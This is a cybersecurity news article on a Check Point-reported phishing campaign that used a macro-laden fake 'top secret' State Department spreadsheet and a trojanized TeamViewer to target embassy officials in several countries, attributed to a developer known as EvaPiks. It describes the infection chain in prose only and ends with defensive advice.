A recent cyberattack campaign employed a weaponized version of TeamViewer and malware disguised as a top secret US government document to target officials in several embassies in Europe.
The malware, phishing documents, and other artifacts used in the attacks appear to all be the work of a single individual using the handle EvaPiks, who’s been active in an illegal Russian-carding forum for some time. However, what’s still not entirely clear is if the same individual is also solely carrying out the attacks as well, or if others are involved, according to researchers at Check Point Software Technologies who spotted the attacks.
“According to our findings, we can tell that EvaPiks is behind the development of the entire infection chain,” says Lotem Finkelsteen, threat intelligence group manager at Check Point.
But the type of victims being targeted, and the multiple-stage nature of the attacks, are more indicative of nation-sponsored actors or sophisticated cyber groups, he says.
“Therefore, we wonder whether he joined others to carry [these] attacks, or he just tunneled others’ attack through his successful infection chain,” using an attack-as-a-service model, Finkelsteen says.
Embassy officials from at least seven countries have been targeted so far—Italy, Kenya, Bermuda, Nepal, Guyana, Lebanon, and Liberia. In each instance, the targeted individuals appeared to have been carefully selected and were tied to government revenue related roles and the financial sector, suggesting a possible financial motive for the attack.
So far though, there’s no evidence of the attacker attempting to gain access to any bank accounts belonging to the governments that have been targeted, Finkelsteen says. Espionage is another possible explanation for the attacks, but it’s hard to tell for sure if there are any geopolitical motives based solely on the list of country’s and victims targeted, he notes.
It must be noted that TeamViewer is a remote desktop sharing and remote access tool that’s widely used around the world.
The motive behind the attacks is yet unclear but researchers believe that financial theft could possibly be the primary objective.
Research further revealed that the alleged hacker has links with Russian-speaking groups because of using Cyrillic artifacts.
The attacks, reportedly, started on 1st April and since then multiple embassies have been targeted. Check Point’s threat intelligence group manager Lotem Finkelsteen stated that:
“The targets were victimized that day, and then the threat actors moved step by step through a multistaged infection chain to further stages until they gained full remote access to the infected devices.”
In this campaign, malware is hidden in TeamViewer in the form of a classified US government XLSM document containing malicious macros and sent via email titled “Military Financing Program.” The file has been carefully crafted and bears the authentic logo of the US Department of State while the file itself is marked “top secret.”
Document used by hackers to spread the malware – Image credit: Check Point
Users must disable macros!
As soon as the macros are enabled, two files are extracted from the XLSM document’s encoded cells. One of the files is an authentic AutoHotkey program, while the other is an infected version of the file that creates a connection with the C&C server to download and execute the malware-bearing version of TeamViewer. When this file is executed, the attacker can establish remote access on the infected device.
Furthermore, the infected version of TeamViewer can download and execute additional commands such as the command to hide the TeamViewer interface to deceive the user or to transfer session credentials to a text document.
Infection chain of the malware – Image credit: Check Point
Threat Point researchers suggest in their blog post that considering the victims that have been targeted and the multi-stage nature of the campaign, it is quite possible that either nation-sponsored hackers or some very sophisticated cybercriminals are involved.
“…We wonder whether he joined others to carry [these] attacks, or he just tunneled others’ attack through his successful infection chain,” said Finkelsteen.
In every attack, the targets were selected quite carefully, and each individual was connected to the government’s revenue-related responsibilities or the financial sector. However, so far there is no evidence of the attacker trying to access the targeted governments’ bank accounts.
Therefore, the other motive behind the attack could be cyber espionage.
Currently, researchers aren’t ruling out geopolitical motives as the main reason behind the attacks too. Nevertheless, users must disable macros, use a reliable anti-virus program and keep their system updated.